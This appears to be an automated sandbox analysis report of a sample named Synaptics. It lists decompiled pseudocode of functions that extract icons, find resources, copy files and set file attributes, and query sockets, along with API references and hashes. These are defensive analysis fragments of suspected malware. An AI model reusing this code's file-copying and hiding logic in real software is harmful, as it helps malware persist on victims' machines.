                                                                                                                                                                                                                            			E00473E4C(intOrPtr __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, char _a4) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				long _v20;
				intOrPtr* _v24;
				short _v544;
				int _t32;
				intOrPtr* _t37;
				void* _t47;
				intOrPtr _t59;
				intOrPtr _t63;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xfffffde4;
				_t47 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t68);
				_push(0x473f3f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				E00405920(_v8, 0x104,  &_v544);
				_t32 = ExtractIconExW( &_v544, 0,  &_v16,  &_v20, 1); // executed
				if(_t32 <= 0) {
					__eflags = 0;
					_pop(_t59);
					 *[fs:eax] = _t59;
					_push(E00473F46);
					return E004049E4( &_v12, 2);
				} else {
					_t37 = E0041DB54(_v12, 1, __edi, 0xffff); // executed
					_v24 = _t37;
					_push(_t68);
					_push(0x473f0b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t70;
					_t72 = _a4;
					if(_a4 == 0) {
						__eflags = 0;
						E00473C54(_v24, _t47, 0, _v16, __edi, __esi, 0); // executed
					} else {
						E00473C54(_v24, _t47, 0, _v20, __edi, __esi, _t72);
					}
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E00473F12);
					return E00403BEC(_v24);
				}
			}

















                                                                                                                                                                                                                            0x00473e4d
                                                                                                                                                                                                                            0x00473e4f
                                                                                                                                                                                                                            0x00473e56
                                                                                                                                                                                                                            0x00473e58
                                                                                                                                                                                                                            0x00473e5b
                                                                                                                                                                                                                            0x00473e61
                                                                                                                                                                                                                            0x00473e69
                                                                                                                                                                                                                            0x00473e70
                                                                                                                                                                                                                            0x00473e71
                                                                                                                                                                                                                            0x00473e76
                                                                                                                                                                                                                            0x00473e79
                                                                                                                                                                                                                            0x00473e8a
                                                                                                                                                                                                                            0x00473ea5
                                                                                                                                                                                                                            0x00473eac
                                                                                                                                                                                                                            0x00473f24
                                                                                                                                                                                                                            0x00473f26
                                                                                                                                                                                                                            0x00473f29
                                                                                                                                                                                                                            0x00473f2c
                                                                                                                                                                                                                            0x00473f3e
                                                                                                                                                                                                                            0x00473eae
                                                                                                                                                                                                                            0x00473ebd
                                                                                                                                                                                                                            0x00473ec2
                                                                                                                                                                                                                            0x00473ec7
                                                                                                                                                                                                                            0x00473ec8
                                                                                                                                                                                                                            0x00473ecd
                                                                                                                                                                                                                            0x00473ed0
                                                                                                                                                                                                                            0x00473ed3
                                                                                                                                                                                                                            0x00473ed7
                                                                                                                                                                                                                            0x00473ee8
                                                                                                                                                                                                                            0x00473ef0
                                                                                                                                                                                                                            0x00473ed9
                                                                                                                                                                                                                            0x00473ee1
                                                                                                                                                                                                                            0x00473ee1
                                                                                                                                                                                                                            0x00473ef7
                                                                                                                                                                                                                            0x00473efa
                                                                                                                                                                                                                            0x00473efd
                                                                                                                                                                                                                            0x00473f0a
                                                                                                                                                                                                                            0x00473f0a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000001,00000000,00000001), ref: 00473EA5
                                                                                                                                                                                                                              • Part of subcall function 00473C54: GetIconInfo.USER32(00000001,?), ref: 00473C87
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Icon$ExtractInfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2636241015-0
                                                                                                                                                                                                                            • Opcode ID: acfe7ac13c5a84df64e210da930adc9f86804b3bd4493eba332945d9c9175a33
                                                                                                                                                                                                                            • Instruction ID: 0bafbf8b306303d6ede9b4da2ad8383aa9ac2d38314ed3fdf0608f00bcdd3931
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: acfe7ac13c5a84df64e210da930adc9f86804b3bd4493eba332945d9c9175a33
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52219875A04208AFDB05DF65DC529EEB7F8EB48304F60847BF508E3690D6386F00DA58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004747D8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 39%
                                                                                                                                                                                                                            			E004747D8(char __eax, void* __ebx, void* __edx, void* __esi) {
				char _v8;
				void* __ecx;
				CHAR* _t11;
				struct HINSTANCE__* _t12;
				struct HRSRC__* _t13;
				void* _t29;
				intOrPtr* _t33;
				struct HINSTANCE__* _t37;
				void* _t38;
				intOrPtr _t41;
				void* _t48;
				intOrPtr _t51;

				_t48 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t51);
				_push(0x474878);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_t11 = E00404E80(_v8);
				_t12 =  *0x49e668; // 0x400000
				_t13 = FindResourceA(_t12, _t11, 0xa); // executed
				if(_t13 == 0) {
					E00404A14(_t48, 0x47488c);
				} else {
					_t37 =  *0x49e668; // 0x400000
					_t33 = E0041E0D0(_t37, 1, 0xa, _v8);
					E0040500C(_t48,  *((intOrPtr*)( *_t33))());
					_push( *((intOrPtr*)( *_t33))());
					_t29 = E00404ED8(_t48);
					_pop(_t38);
					E0041D8CC(_t33, _t38, _t29);
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E0047487F);
				return E004049C0( &_v8);
			}















                                                                                                                                                                                                                            0x004747de
                                                                                                                                                                                                                            0x004747e0
                                                                                                                                                                                                                            0x004747e6
                                                                                                                                                                                                                            0x004747ed
                                                                                                                                                                                                                            0x004747ee
                                                                                                                                                                                                                            0x004747f3
                                                                                                                                                                                                                            0x004747f6
                                                                                                                                                                                                                            0x004747fe
                                                                                                                                                                                                                            0x00474804
                                                                                                                                                                                                                            0x0047480a
                                                                                                                                                                                                                            0x00474811
                                                                                                                                                                                                                            0x0047485d
                                                                                                                                                                                                                            0x00474813
                                                                                                                                                                                                                            0x00474819
                                                                                                                                                                                                                            0x0047482b
                                                                                                                                                                                                                            0x00474837
                                                                                                                                                                                                                            0x00474842
                                                                                                                                                                                                                            0x00474845
                                                                                                                                                                                                                            0x0047484e
                                                                                                                                                                                                                            0x0047484f
                                                                                                                                                                                                                            0x0047484f
                                                                                                                                                                                                                            0x00474864
                                                                                                                                                                                                                            0x00474867
                                                                                                                                                                                                                            0x0047486a
                                                                                                                                                                                                                            0x00474877

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0047480A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FindResource
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1635176832-0
                                                                                                                                                                                                                            • Opcode ID: 12d79ed0c0414dd06bbb4c4c1c3812f09eebba2d0f4e2bd5e91d85672a3e2749
                                                                                                                                                                                                                            • Instruction ID: 3aff7a426593e0292f2699da8adb463acbb462f0eeeb319a78e6b77317a5089b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12d79ed0c0414dd06bbb4c4c1c3812f09eebba2d0f4e2bd5e91d85672a3e2749
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B117074700204AFD300FBAADC5296AB3EDFB89714B51807AF508E7291DB39DD01875A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00473804 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E00473804(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _t51;
				void* _t56;
				void* _t59;
				void* _t61;

				_t61 = __eflags;
				_v20 = 0;
				_v16 = 0;
				_t56 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t59);
				_push(0x4738af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t59 + 0xfffffff0;
				if(E00409A48(_v12, _t61) != 0) {
					E00404BB8( &_v16, E00404E80(_v12));
					E00409A90(_v16, 0x80);
				}
				_t44 = E00404E80(_v12);
				CopyFileA(E00404E80(_v8), _t25, 0); // executed
				E00404BB8( &_v20, _t44);
				E00409A90(_v20, _t56);
				_pop(_t51);
				 *[fs:eax] = _t51;
				_push(E004738B6);
				return E004049E4( &_v20, 4);
			}











                                                                                                                                                                                                                            0x00473804
                                                                                                                                                                                                                            0x0047380e
                                                                                                                                                                                                                            0x00473811
                                                                                                                                                                                                                            0x00473814
                                                                                                                                                                                                                            0x00473816
                                                                                                                                                                                                                            0x00473819
                                                                                                                                                                                                                            0x0047381f
                                                                                                                                                                                                                            0x00473827
                                                                                                                                                                                                                            0x0047382e
                                                                                                                                                                                                                            0x0047382f
                                                                                                                                                                                                                            0x00473834
                                                                                                                                                                                                                            0x00473837
                                                                                                                                                                                                                            0x00473844
                                                                                                                                                                                                                            0x00473853
                                                                                                                                                                                                                            0x00473860
                                                                                                                                                                                                                            0x00473860
                                                                                                                                                                                                                            0x0047386f
                                                                                                                                                                                                                            0x0047387b
                                                                                                                                                                                                                            0x00473885
                                                                                                                                                                                                                            0x0047388f
                                                                                                                                                                                                                            0x00473896
                                                                                                                                                                                                                            0x00473899
                                                                                                                                                                                                                            0x0047389c
                                                                                                                                                                                                                            0x004738ae

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0047387B
                                                                                                                                                                                                                              • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,00000006,00000000,?,00000000,00476826,?,00476888,?,00476888,00000000,00000000,0000000A,KBHKS,?,00476888), ref: 00409AA2
                                                                                                                                                                                                                              • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,00000006,00000000,?,00000000,00476826,?,00476888,?,00476888,00000000,00000000,0000000A,KBHKS,?,00476888), ref: 00409AAB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$AttributesCopyErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2414470624-0
                                                                                                                                                                                                                            • Opcode ID: 54818fb427acebfbc57ebfdf2a7bc526e9989a66fd20d79204ed49da3fec111c
                                                                                                                                                                                                                            • Instruction ID: 249739c2ab59324f255857505799179cd9e45a8e1fd9df759088737bab44b84f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54818fb427acebfbc57ebfdf2a7bc526e9989a66fd20d79204ed49da3fec111c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C1116B0E001099BDB00EFAAD88299EB7F9FF44714F51457BF514B3391DB389E058A98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047D26C Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 43%
                                                                                                                                                                                                                            			E0047D26C(intOrPtr* __eax, void* __ebx, signed int* __ecx, void* __edx, void* __edi, void* __esi, signed int* _a4, intOrPtr _a8) {
				char _v8;
				void* _v20;
				intOrPtr _v22;
				signed short _v24;
				char _v28;
				intOrPtr* _t18;
				intOrPtr* _t29;
				intOrPtr* _t38;
				intOrPtr _t49;
				signed int* _t51;
				void* _t54;
				void* _t56;

				_v28 = 0;
				_t51 = __ecx;
				_t38 = __eax;
				 *[fs:eax] = _t56 + 0xffffffe8;
				_v8 = 0x10;
				_t18 =  *0x49d75c; // 0x49ecd8
				 *((intOrPtr*)( *_t18))(__edx,  &_v24,  &_v8,  *[fs:eax], 0x47d2fa, _t56, __edi, __esi, __ebx, _t54); // executed
				E0047BCA8();
				 *_t51 = _v24 & 0x0000ffff;
				 *((intOrPtr*)( *_t38 + 0x7c))();
				E00404A14(_a8, _v28);
				_t29 =  *0x49d988; // 0x49ecf8
				 *_a4 =  *((intOrPtr*)( *_t29))(_v22) & 0x0000ffff;
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x47d301);
				return E004049C0( &_v28);
			}















                                                                                                                                                                                                                            0x0047d277
                                                                                                                                                                                                                            0x0047d27a
                                                                                                                                                                                                                            0x0047d27e
                                                                                                                                                                                                                            0x0047d28b
                                                                                                                                                                                                                            0x0047d28e
                                                                                                                                                                                                                            0x0047d29e
                                                                                                                                                                                                                            0x0047d2a5
                                                                                                                                                                                                                            0x0047d2ab
                                                                                                                                                                                                                            0x0047d2b4
                                                                                                                                                                                                                            0x0047d2c0
                                                                                                                                                                                                                            0x0047d2c9
                                                                                                                                                                                                                            0x0047d2d3
                                                                                                                                                                                                                            0x0047d2e2
                                                                                                                                                                                                                            0x0047d2e6
                                                                                                                                                                                                                            0x0047d2e9
                                                                                                                                                                                                                            0x0047d2ec
                                                                                                                                                                                                                            0x0047d2f9

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • getsockname.WS2_32(?,?,00000010,00000000,0047D2FA), ref: 0047D2A5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: getsockname
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3358416759-0
                                                                                                                                                                                                                            • Opcode ID: f967102204f6f4aed3aeaf4e47652de67eb898ed1214602bbb5051f58e7d0b15
                                                                                                                                                                                                                            • Instruction ID: 8a280b85d509fd19767874a1b7a6a98121d32f32e710f6eeb76a30564a751db0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f967102204f6f4aed3aeaf4e47652de67eb898ed1214602bbb5051f58e7d0b15
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA111CB5A102099FC700DFA9D8819AAB7F8EB8D710B508576B904E3350EA349D04CBA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0041A81C Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E0041A81C(void* __eax, struct HINSTANCE__* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				intOrPtr _t15;
				struct HINSTANCE__* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				void* _t32;
				intOrPtr* _t35;
				intOrPtr _t38;
				intOrPtr _t40;

				_t38 = _t40;
				_push(_t22);
				_t35 = _t22;
				_t20 = __edx;
				_t32 = __eax;
				if(__edx == 0) {
					_t20 =  *0x49e668; // 0x400000
				}
				_t10 = FindResourceA(_t20, E00404E80(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
				_t43 = _t10;
				if(_t10 == 0) {
					return _t10;
				} else {
					_v8 = E0041E0D0(_t20, 1, 0xa, _t32);
					_push(_t38);
					_push(0x41a890);
					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					_t15 = E0041DA30(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
					 *_t35 = _t15;
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x41a897);
					return E00403BEC(_v8);
				}
			}


















                                                                                                                                                                                                                            0x0041a81d
                                                                                                                                                                                                                            0x0041a81f
                                                                                                                                                                                                                            0x0041a823
                                                                                                                                                                                                                            0x0041a825
                                                                                                                                                                                                                            0x0041a827
                                                                                                                                                                                                                            0x0041a82b
                                                                                                                                                                                                                            0x0041a82d
                                                                                                                                                                                                                            0x0041a82d
                                                                                                                                                                                                                            0x0041a845
                                                                                                                                                                                                                            0x0041a848
                                                                                                                                                                                                                            0x0041a84a
                                                                                                                                                                                                                            0x0041a89e
                                                                                                                                                                                                                            0x0041a84c
                                                                                                                                                                                                                            0x0041a85d
                                                                                                                                                                                                                            0x0041a862
                                                                                                                                                                                                                            0x0041a863
                                                                                                                                                                                                                            0x0041a868
                                                                                                                                                                                                                            0x0041a86b
                                                                                                                                                                                                                            0x0041a873
                                                                                                                                                                                                                            0x0041a878
                                                                                                                                                                                                                            0x0041a87c
                                                                                                                                                                                                                            0x0041a87f
                                                                                                                                                                                                                            0x0041a882
                                                                                                                                                                                                                            0x0041a88f
                                                                                                                                                                                                                            0x0041a88f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0041A83E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FindResource
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1635176832-0
                                                                                                                                                                                                                            • Opcode ID: ab9e2e2e5987fb8538000ef7ea5255ae4d2481a6a9c4e282ae103432873fbd2f
                                                                                                                                                                                                                            • Instruction ID: 3fa3efa78a76847535e85a5113efc15ba7d11e1912711d246983766bb9fbce65
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab9e2e2e5987fb8538000ef7ea5255ae4d2481a6a9c4e282ae103432873fbd2f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E014771304300ABE301EF6AEC42EAAB7ADEB88728711407EF504C7381DA79AC028258
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00407AE4 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00407AE4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				long _v8;
				void* _t12;
				struct HWND__* _t22;
				long _t27;
				CHAR* _t30;

				_v8 = _t27;
				_t30 = __eax;
				_t12 = E00402C0C();
				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t12);
				return _t22;
			}








                                                                                                                                                                                                                            0x00407aeb
                                                                                                                                                                                                                            0x00407af0
                                                                                                                                                                                                                            0x00407af2
                                                                                                                                                                                                                            0x00407b21
                                                                                                                                                                                                                            0x00407b2a
                                                                                                                                                                                                                            0x00407b36

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                                                                            • Opcode ID: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                                                                                                                                                                                            • Instruction ID: 82a16aa5288589ed1fecfa95a929c264de13a72832aac3a4e9138b950186d13c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F092B2704158BFDB80DE9EDD85E9B77ECEB4C264B00416ABA0CD7241D574ED108BA4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004098C4 Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004098C4(signed int __eax, signed int __edx) {
				signed int _t6;
				void* _t14;
				signed int _t21;

				_t6 = __eax | 0xffffffff;
				_t21 = __edx & 0x00000003;
				if(_t21 <= 2 && (__edx & 0x000000f0) <= 0x40) {
					_t14 = CreateFileA(E00404E80(__eax),  *(0x49b168 + _t21 * 4),  *(0x49b174 + ((__edx & 0x000000f0) >> 4) * 4), 0, 3, 0x80, 0); // executed
					return _t14;
				}
				return _t6;
			}






                                                                                                                                                                                                                            0x004098cb
                                                                                                                                                                                                                            0x004098d0
                                                                                                                                                                                                                            0x004098d6
                                                                                                                                                                                                                            0x00409912
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00409912
                                                                                                                                                                                                                            0x0040991a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00418E54,0041DC4D,00000000,0041DCC1,?,00000000,00418E54), ref: 00409912
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                            • Opcode ID: 82fefd3b3b9ca76e2e88682aaf7516e120e0fb712907eec23904fd220d06e7c1
                                                                                                                                                                                                                            • Instruction ID: b30b33c97570f0ad182992fe68bae19e4a03d6d27b321f753603774e79905647
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82fefd3b3b9ca76e2e88682aaf7516e120e0fb712907eec23904fd220d06e7c1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77E0EDA278010422FA30A5DCACC3F5B514ED7C57A9F0A023BF594EB3D2C16C9C0192A8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040C918 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040C918(long __eax, void* __edx) {
				char _v260;
				long _t6;
				void* _t9;
				void* _t16;
				void* _t18;

				_t9 = __edx;
				_t6 = FormatMessageA(0x3200, 0, __eax, 0,  &_v260, 0x100, 0); // executed
				while(_t6 > 0) {
					_t16 =  *((intOrPtr*)(_t18 + _t6 - 1)) - 0x21;
					if(_t16 < 0 || _t16 == 0xd) {
						_t6 = _t6 - 1;
						continue;
					}
					break;
				}
				return E00404AB0(_t9, _t6, _t18);
			}








                                                                                                                                                                                                                            0x0040c91f
                                                                                                                                                                                                                            0x0040c937
                                                                                                                                                                                                                            0x0040c93f
                                                                                                                                                                                                                            0x0040c947
                                                                                                                                                                                                                            0x0040c94a
                                                                                                                                                                                                                            0x0040c93e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040c93e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040c94a
                                                                                                                                                                                                                            0x0040c962

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00418E54,0041DC7F,00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 0040C937
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FormatMessage
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1306739567-0
                                                                                                                                                                                                                            • Opcode ID: 92a936b21cd9d94937c526833fb5441d460329d379bcf8ed0327f68837e686ad
                                                                                                                                                                                                                            • Instruction ID: 84e049c2e5adfe6bfcf788a8d77e6067e1cf108f27a381f6f91ce7570d17270d
